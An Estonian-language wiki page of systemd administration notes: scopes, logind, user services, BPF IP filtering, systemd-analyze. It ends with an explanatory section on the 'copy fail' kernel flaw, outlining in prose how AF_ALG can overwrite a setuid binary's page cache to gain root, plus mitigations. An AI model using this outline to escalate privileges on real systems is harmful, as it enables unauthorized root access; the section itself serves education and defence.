Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

dbus kaudu scope kapslis protsessi töötamine, käivitada protsess

<pre>
root@systemd-02:~# sleep 300 &
[1] 9261
</pre>

Seostada protsess eraldi moodustatud systemd slice osakonnaga

<pre>
root@systemd-02:~# busctl call org.freedesktop.systemd1 \
/org/freedesktop/systemd1 \
org.freedesktop.systemd1.Manager \
StartTransientUnit \
"ssa(sv)a(sa(sv))" \
"real-server-mimic.scope" \
"fail" \
2 "Slice" "s" "custom-labs-01.slice" "PIDs" "au" 1 8702 \
0
o "/org/freedesktop/systemd1/job/62153"
</pre>

kus

* org.freedesktop.systemd1 /org/freedesktop/systemd1: The destination path pointing directly to systemd's primary system core.
* StartTransientUnit: The literal internal API function name.
* "ssa(sv)a(sa(sv))": The explicit structural signature definition. It alerts systemd to expect: String, String, Array of Variants, and a nested Array of auxiliary configurations.
* "my-direct-dbus.scope": The custom name for the new leaf node container.
* "fail": The conflict mode. It instructs systemd: "If a scope with this exact name already exists, throw an error instead of overriding it."
* 2 "Slice" "s" "custom-labs-01.slice" "PIDs" "au" 1 8620: This tells systemd we are supplying 2 properties inside our payload array:

Set the target Slice property to the string value "custom-labs-01.slice".

Populate the PIDs property array with an active array size of 1, passing our target PID unsigned integer value (8620).

* 0: Passes an empty auxiliary parameters list.

tulemuse kontrolliks

<pre>
root@systemd-02:~# systemd-cgls /custom.slice
CGroup /custom.slice:
└─custom-labs.slice
└─custom-labs-02.slice
└─real-server-02.scope
└─9261 sleep 300
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-hostnamed===

Väited

* busctl käivitab systemd-hostnamed protsessi ajutiselt vastavalt vajadusele
* ta on 'D-Bus On-Demand Activated Service' ehk 'Transient/Ephemeral Daemon' ehk 'Lazy-Loaded / Socket-Activated Daemon'

Muudatuse tegemiseks sobib öelda

<pre>
root@ns-pg-01:~# hostnamectl set-hostname ns-pg-01
</pre>

kus

* muudetakse /etc/hostname fail
* ei muudeta /etc/hosts faili
* väidetavalt teavitatakse syslog jt deemoneid st restart vms ei ole vajalik arvutile
* reaalselt süsteemi hostname muutmisel hostnamectl programmist väga palju abi ei ole, /etc/hosts fail tuleb käsitsi muuta

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

ebpf on seotud mitte protsessiga, aga cgroup'iga nt nginx cgroup juurde kuuluvate ebpf'ide nimekirja esitamine

<pre>
root@systemd-02:~# bpftool cgroup show /sys/fs/cgroup/system.slice/nginx.service
ID AttachType AttachFlags Name
74 cgroup_inet_ingress multi sd_fw_ingress
73 cgroup_inet_egress multi sd_fw_egress
</pre>

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su' - nt lugedes faili tavalisel viisil satub tema sisu page cache'i
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus) - see on võimalik tänu eksploidi toimimisele - üldiselt on linux kerneli lubadus selline, et kui protsess (privilegeerimata protsess antud juhul) ei saa failisüsteemis faili muuta, siis ei saa ta tegeleda ka cache'itud vastava faili sisuga)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega, mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (asuvad arvuti mälus)

|
v

vfs (virtual file system) (asub arvuti mälus)

|
v

page cache (asub arvuti mälus)

|
v

ext4 filesystem (asub plokkseadmel)

|
v

plokkseade (asub nö füüsilisel esemel)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

